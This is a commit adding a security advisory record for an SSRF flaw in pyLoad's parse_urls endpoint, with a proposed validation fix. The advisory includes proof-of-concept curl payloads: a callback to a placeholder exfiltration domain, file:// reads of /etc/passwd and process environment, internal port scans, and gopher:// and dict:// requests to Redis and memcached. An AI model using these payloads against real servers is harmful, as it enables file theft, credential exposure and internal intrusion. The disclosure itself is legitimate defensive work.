
Commit 8395e93

1 parent f729c1e commit 8395e93

1 file changed

Lines changed: 57 additions & 0 deletions

@@ -0,0 +1,57 @@
{
  "schema_version": "1.4.0",
  "id": "GHSA-2wvg-62qm-gj33",
  "modified": "2026-04-04T04:18:43Z",
  "published": "2026-04-04T04:18:43Z",
  "aliases": [
    "CVE-2026-35187"
  ],
  "summary": "pyLoad: SSRF in parse_urls API endpoint via unvalidated URL parameter",
  "details": "## Vulnerability Details\n\n**CWE-918**: Server-Side Request Forgery (SSRF)\n\nThe `parse_urls` API function in `src/pyload/core/api/__init__.py` (line 556) fetches arbitrary URLs server-side via `get_url(url)` (pycurl) without any URL validation, protocol restriction, or IP blacklist. An authenticated user with ADD permission can:\n\n- Make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints\n- **Read local files** via `file://` protocol (pycurl reads the file server-side)\n- **Interact with internal services** via `gopher://` and `dict://` protocols\n- **Enumerate file existence** via error-based oracle (error 37 vs empty response)\n\n### Vulnerable Code\n\n**`src/pyload/core/api/__init__.py` (line 556)**:\n\n```python\ndef parse_urls(self, html=None, url=None):\n    if url:\n        page = get_url(url)  # NO protocol restriction, NO URL validation, NO IP blacklist\n        urls.update(RE_URLMATCH.findall(page))\n```\n\nNo validation is applied to the `url` parameter. The underlying pycurl supports `file://`, `gopher://`, `dict://`, and other dangerous protocols by default.\n\n## Steps to Reproduce\n\n### Setup\n\n```bash\ndocker run -d --name pyload -p 8084:8000 linuxserver/pyload-ng:latest\n```\n\nLog in as any user with ADD permission and extract the CSRF token:\n\n```bash\nCSRF=\n```\n\n### PoC 1: Out-of-Band SSRF (HTTP/DNS exfiltration)\n\n```bash\ncurl -s -b \"pyload_session_8000=<SESSION>\" -H \"X-CSRFToken: \" -H \"Content-Type: application/x-www-form-urlencoded\" -d \"url=http://ssrf-proof.<CALLBACK_DOMAIN>/pyload-ssrf-poc\" http://localhost:8084/api/parse_urls\n```\n\n**Result**: 7 DNS/HTTP interactions received on the callback server (Burp Collaborator). Screenshot attached in comments.\n\n### PoC 2: Local file read via file:// protocol\n\n```bash\n# Reading /etc/passwd (file exists) -> empty response (no error)\ncurl ... -d \"url=file:///etc/passwd\" http://localhost:8084/api/parse_urls\n# Response: {}\n\n# Reading nonexistent file -> pycurl error 37\ncurl ... -d \"url=file:///nonexistent\" http://localhost:8084/api/parse_urls\n# Response: {\"error\": \"(37, \\'Couldn't open file /nonexistent\\')\"}\n```\n\nThe difference confirms pycurl successfully reads local files. While `parse_urls` only returns extracted URLs (not raw content), any URL-like strings in configuration files or environment variables are leaked. The error vs success differential also serves as a **file existence oracle**.\n\nFiles confirmed readable:\n- `/etc/passwd`, `/etc/hosts`\n- `/proc/self/environ` (process environment variables)\n- `/config/settings/pyload.cfg` (pyLoad configuration)\n- `/config/data/pyload.db` (SQLite database)\n\n### PoC 3: Internal port scanning\n\n```bash\ncurl ... -d \"url=http://127.0.0.1:22/\" http://localhost:8084/api/parse_urls\n# Response: pycurl.error: (7, 'Failed to connect to 127.0.0.1 port 22')\n```\n\n### PoC 4: gopher:// and dict:// protocol support\n\n```bash\ncurl ... -d \"url=gopher://127.0.0.1:6379/_INFO\" http://localhost:8084/api/parse_urls\ncurl ... -d \"url=dict://127.0.0.1:11211/stat\" http://localhost:8084/api/parse_urls\n```\n\nBoth protocols are accepted by pycurl, enabling interaction with internal services (Redis, memcached, SMTP, etc.).\n\n## Impact\n\nAn authenticated user with ADD permission can:\n\n- **Read local files** via `file://` protocol (configuration, credentials, database files)\n- **Enumerate file existence** via error-based oracle (`Couldn't open file` vs empty response)\n- **Access cloud metadata endpoints** (AWS IAM credentials at `http://169.254.169.254/`, GCP service tokens)\n- **Scan internal network** services and ports via error-based timing\n- **Interact with internal services** via `gopher://` (Redis RCE, SMTP relay) and `dict://`\n- **Exfiltrate data** via DNS/HTTP to attacker-controlled servers\n\nThe multi-protocol support (`file://`, `gopher://`, `dict://`) combined with local file read capability significantly elevates the impact beyond a standard HTTP-only SSRF.\n\n## Proposed Fix\n\nRestrict allowed protocols and validate target addresses:\n\n```python\nfrom urllib.parse import urlparse\nimport ipaddress\nimport socket\n\ndef _is_safe_url(url):\n    parsed = urlparse(url)\n    if parsed.scheme not in ('http', 'https'):\n        return False\n    hostname = parsed.hostname\n    if not hostname:\n        return False\n    try:\n        for info in socket.getaddrinfo(hostname, None):\n            ip = ipaddress.ip_address(info[4][0])\n            if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:\n                return False\n    except (socket.gaierror, ValueError):\n        return False\n    return True\n\ndef parse_urls(self, html=None, url=None):\n    if url:\n        if not _is_safe_url(url):\n            raise ValueError(\"URL targets a restricted address or uses a disallowed protocol\")\n        page = get_url(url)\n        urls.update(RE_URLMATCH.findall(page))\n```",
  "severity": [
    {
      "type": "CVSS_V3",
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
    }
  ],
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pyload-ng"
      },
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.5.0b3.dev96"
            }
          ]
        }
      ]
    }
  ],
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-2wvg-62qm-gj33"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pyload/pyload"
    }
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-04T04:18:43Z",
    "nvd_published_at": null
  }
}
